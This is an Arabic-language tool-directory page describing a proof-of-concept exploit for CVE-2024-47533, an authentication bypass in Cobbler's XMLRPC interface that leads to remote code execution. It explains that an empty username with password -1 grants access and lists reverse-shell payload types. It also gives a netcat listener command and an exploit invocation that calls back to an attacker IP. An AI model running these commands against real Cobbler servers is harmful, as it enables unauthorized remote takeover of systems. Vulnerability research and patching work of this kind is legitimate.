Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC — CVE-2024-47533 هي ثغرة أمنية خطيرة لتجاوز المصادقة في Cobbler (الإصدارات 3.0.0 حتى ما قبل 3.2.3 و3.3.7) تسمح بتنفيذ تعليمات برمجية عن بُعد دون مصادقة عبر واجهة XMLRPC. | Kitploit
أدوات/GitHubGitHub/dollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc
المصادقة والترخيصتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubdollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc

CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC

CVE-2024-47533 هي ثغرة أمنية خطيرة لتجاوز المصادقة في Cobbler (الإصدارات 3.0.0 حتى ما قبل 3.2.3 و3.3.7) تسمح بتنفيذ تعليمات برمجية عن بُعد دون مصادقة عبر واجهة XMLRPC.

عرض المستودعالموقع الإلكتروني
81منذ سنة واحدةلم تتم المراجعة بعد

CVE-2024-47533 - استغلال تجاوز المصادقة وتنفيذ الأوامر عن بُعد في Cobbler عبر XMLRPC

⚠️ تنفيذ تعليمات برمجية عن بُعد خطير عبر تجاوز المصادقة في Cobbler
🛠️ تنفيذ الإثبات العملي بواسطة @dollarboysushil


💡 نظرة عامة

Cobbler، خادم تثبيت Linux الذي يتيح الإعداد السريع لبيئات تثبيت الشبكة، يحتوي على ثغرة مصادقة في الإصدارات من 3.0.0 وحتى (وليس بما في ذلك) 3.2.3 و 3.3.7. تقوم الدالة utils.get_shared_secret() دائمًا بإرجاع -1، مما يسمح لأي شخص بالاتصال بواجهة XML-RPC الخاصة بـ Cobbler باستخدام اسم مستخدم فارغ ('') وكلمة مرور -1. وهذا يسمح للمهاجم الذي لديه وصول إلى الشبكة بالحصول على سيطرة كاملة على خادم Cobbler. تم إصلاح الثغرة في الإصدارين 3.2.3 و 3.3.7.


🛠 التحليل الفني

تحدث الثغرة بسبب معالجة غير صحيحة للسر المشترك في دالة utils.get_shared_secret()، والتي تُرجع دائمًا -1، مما يتجاوز المصادقة فعليًا. وهذا يسمح لأي مستخدم على الشبكة بالاتصال بواجهة XMLRPC الخاصة بـ Cobbler باستخدام بيانات اعتماد فارغة وتنفيذ أوامر عشوائية.


🔥 نقطة النهاية الثغرة

http://<target>:25151/ — نقطة نهاية واجهة برمجة تطبيقات XMLRPC الخاصة بـ Cobbler


💥 أمثلة على الأكواد الضارة

يدعم script الاستغلال العديد من أكواد الصدفة العكسية بما في ذلك:

  • صدفة عكسية Bash
  • صدفات Netcat (nc, nc2)
  • صدفة عكسية Python
  • تنزيل وتنفيذ عبر Curl

🔬 عرض الإثبات العملي (PoC)

📡 تجهيز المُستمع

ابدأ مُستمع Netcat على جهازك:

root@kitploit:~
nc -lvnp 4444

netcat listener

🚀 تشغيل الاستغلال

قم بتشغيل script الاستغلال CVE-2024-47533-dbs.py.

root@kitploit:~
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

CVE-2024-47533-dbs.py

💻 الوصول الناجح إلى الصدفة عن بُعد

عند التنفيذ الناجح، ستتصل الصدفة العكسية مرة أخرى بالمُستمع، مما يمنح المهاجم وصولاً عن بُعد إلى الخادم.

Successfull Reverse Shell

📝 المراجع

  • نشرة أمان SUSE لـ CVE-2024-47533
  • نشرة أمان GitHub GHSA-m26c-fcgh-cp6h
  • قاعدة بيانات الثغرات في Snyk: SNYK-PYTHON-COBBLER-8384360
تنزيل الأداة